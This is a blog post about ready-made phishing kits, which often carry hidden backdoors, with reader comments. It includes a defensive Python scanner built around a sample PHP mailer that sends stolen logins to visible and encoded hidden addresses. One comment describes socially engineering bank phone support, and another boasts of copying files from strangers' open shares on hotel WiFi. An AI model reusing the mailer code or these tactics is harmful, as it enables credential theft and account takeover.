Any Joe Sixpack Can Be A Phisher

The popular conception of phishers is of shadowy electronic masterminds, using a mix of technical prowess, deception and anonymity to trick consumers into handing over their bank account details. Actually, most of them are too stupid to design their own websites. That’s what two security researchers found when they delved deep into the online phishing community.

Their research revealed that most phishers use ready-made kits, made by a small group of people and then sold and traded online. All you have to do is fill in a few form fields, give it an email address to send people’s bank account info to, and deploy it on a compromised server. Boom, insta-phishing scam. What’s more, the kits, servers and programs routinely have backdoors built in, so the phishers are being phished themselves: the details a kit steals are quietly copied to whoever wrote it. It’s amazing to think that one of the greatest threats to the modern banking system is being perpetrated by a network of average people whose only unique talent is their capacity for immorality.
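The backdoor trick is simple enough to check for. Below is an added example, not code from the article or from the Dhanjani/Rios research: a small Python scanner that reads a kit’s PHP mailer and lists every address the stolen credentials get sent to, including a recipient the kit author hid behind base64 or hex so the person who deployed the kit never notices it. The kit text is a constructed sample; the addresses, variable names and the `analyze()` helper are assumptions made for the demo, not artefacts of any real kit.

```python
"""Scan a phishing kit's PHP source for every address credentials are mailed to.

Added example for this page (not the article's or the researchers' code).
SAMPLE_KIT is constructed for the demo; its addresses, variable names and the
analyze() helper are assumptions, not artefacts of a real kit.
"""
import base64
import re

# Constructed sample: a kit "mailer" with one visible recipient (the operator's
# drop box) and two encoded recipients the kit author slipped in.
SAMPLE_KIT = r"""<?php
// the part of the mailer the operator edits
$to = "dropbox@example.com";
$subject = "Login Details";
$message = "User: " . $_POST['user'] . "\nPass: " . $_POST['pass'];
mail($to, $subject, $message);
// what the operator does not see: two extra copies for the kit author
$bd1 = base64_decode("YXV0aG9yQGV4YW1wbGUubmV0");
mail($bd1, $subject, $message);
$bd2 = hex2bin("617574686f7232406578616d706c652e6f7267");
mail($bd2, $subject, $message);
header("Location: https://bank.example/login");
?>
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
STRING_RE = re.compile(r"""(["'])(.*?)\1""")  # single- or double-quoted PHP literals
MAIL_RE = re.compile(r"\bmail\s*\(")


def _base64(s):
    # validate=True rejects literals containing anything outside the base64 alphabet
    return base64.b64decode(s, validate=True).decode("utf-8", "ignore")


def _hex(s):
    return bytes.fromhex(s).decode("utf-8", "ignore")


# Encodings a kit author might use to keep a second recipient out of sight.
DECODERS = {"base64": _base64, "hex": _hex}


def find_recipients(php_source):
    """Map each email address found in a string literal to how it was stored:
    'plain', or the name of the decoder that revealed it."""
    found = {}
    for _, literal in STRING_RE.findall(php_source):
        plain = EMAIL_RE.findall(literal)
        if plain:
            for addr in plain:
                found.setdefault(addr, "plain")
            continue  # readable address; do not also report its "decodings"
        for name, decode in DECODERS.items():
            try:
                text = decode(literal)
            except (ValueError, UnicodeError):  # not valid in this encoding
                continue
            for addr in EMAIL_RE.findall(text):
                found.setdefault(addr, name)
    return found


def analyze(php_source):
    """Summarise where a kit sends its loot: how many mail() calls it makes,
    every recipient found, and which of those were hidden by an encoding."""
    recipients = find_recipients(php_source)
    return {
        "mail_calls": len(MAIL_RE.findall(php_source)),
        "recipients": recipients,
        "hidden": sorted(a for a, how in recipients.items() if how != "plain"),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_KIT)
    print("mail() calls:", report["mail_calls"])
    for addr, how in report["recipients"].items():
        print(f"  {addr:24} ({how})")
    print("hidden recipients:", report["hidden"])
```

Run against the sample, the scanner reports three `mail()` calls but only one readable address, and flags the other two as base64- and hex-encoded. The caveat: this only catches recipients stored as a single encoded literal. A kit that assembles the address from concatenated fragments, `chr()` calls or an `eval()` of encoded PHP needs a proper PHP parser or a sandboxed run with outbound mail intercepted, which is the check worth doing before trusting any third-party kit source.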

Interview with Nitesh Dhanjani and Billy Rios, Spies in the Phishing Underground [Net Security]
(Photo: Getty)



  1. spamtasticus says:

    The “new” phishing scam going around is that the phishers are actually being phished themselves. These idiots download phishing software to scam the public, but inside the software they download is a back door that secretly forwards the stolen information to the person who actually wrote the program.

  2. yasth says:

    Subaverage people are generally the criminal classes.

    And a good thing too, as truthfully many of the protections suck.

  3. azntg says:

    I guess the moral of the story is: “Don’t be an idiot. Don’t fall for the idiot’s own idiocy”?

  4. B says:

    where do I sign?

  5. spamtasticus says:

    The banks are more dangerous and complicitous than the phishers. Try an experiment. Call your own bank and tell them you don’t remember your online login info. When they need to “identify” you, make like you don’t remember the secret answer to the question they set up a long time ago (this should be easy, as most people don’t remember anyway). When they try to “help” you identify yourself, don’t give them any information that is not public record. Remember: Social Security number, mother’s maiden name, and anything else on your credit record is in fact public record. If you doubt me, just think back how many times you have handed companies your social. Then try to imagine how many people in that company have access to your social. You will find that you will get access to your online account over the phone (the fact that it is actually yours is a technicality in this experiment). Trust me, I write database systems for some of the largest companies and organizations in the world as well as medium-size businesses. It’s not the “evil” hacker you need to worry about, it’s the 700 employees that have access to all your info within the company.

  6. spamtasticus says:

    @spamtasticus: my fault for not reading the whole comment before excitedly being the first poster lol

  7. bohemian says:

    @spamtasticus: To start using online services or to retrieve lost login info with both of our banks requires an in person trip to the main branch. These are both local/regional so it would only be an issue if we move out of town again.

  8. Nytmare says:

    I believe it’s the same situation with spam, spyware, and bot-net builders – peon spammers will pay $500 for junky software from other spammers to spam with, spyware makers create endless clones of their software, and bot-net operators build referral networks to get others to install their spyware and trojans for them. The only ones who really make money are at the top of the pyramids.

  9. CaliforniaCajun says:

    Yes, you too can be a phisher simply by opening “Network Neighborhood” on your Windows or Mac machine while at a hotel with free WiFi.

    I scored a bunch of interesting papers, about 1GB of music, and several neat pictures and videos while at a hotel recently from someone named “NANNASXP”.

    Dumb, dumb, dumb. Folks, either set your machine up properly, use an OS that is locked down to begin with, or stop surfing free Hotspots!

  10. lemur says:

    From the OP:

    The popular conception of phishers is of shadowy electronic masterminds, using a mix of technical prowess, deception and anonymity to trick consumers into handing over the bank account details.

    Well, the “popular conception” is formed from bad news reports. I can’t count the number of times I’ve read articles that were authored by journalists who obviously don’t understand anything about security. If a computer is involved, suddenly a crook becomes a genius, and it does not really matter whether or not any great mental powers were required to commit the crime.

    If a crook finds the key to your house which you left under your backdoor mat, he’s just a crook. But if a crook finds the password to your computer which you left in the bottom drawer of your desk, he’s a genius!

  11. theblackdog says:

    @CaliforniaCajun: several neat pictures and videos while at a hotel recently from someone named “NANNASXP”.

    Aren’t most people who are called “Nanna” a grandmother?

    *backs slowly away*

  12. elangomatt says:

    I have always thought it was pretty obvious that it was just some Joe Schmo doing the phishing scams because if the phishers are smart, they would actually use proper spelling, grammar, and punctuation. I usually like to read the phishing emails just to laugh at all of the mistakes in them. I am also quite impressed once in a great while when I actually get a flawless phishing email. I actually printed out a phishing email the other day before deleting it because it was such a well done email, I can understand how some people can get pulled in.

  13. Ghede says:

    … You have to admire the crackers, dubious evil bastards they are. They are both increasing their potential income, and protecting themselves from potential legal action. They’ve created a true organized crime network, and here is the kicker; THE GRUNTS DON’T KNOW WHO THEY ARE!

    That being said, all phishers, spoofers, spammers, crackers, and making-up-namers should be hunted down, and serve their proper sentences. They are people who think that because they are more informed than you, they can ruin your life. They are impeding progress.

  14. MYarms says:

    If these phishers are actually morons like they say then how are they deploying these programs on compromised servers? Wouldn’t that process take some kind of technical know-how?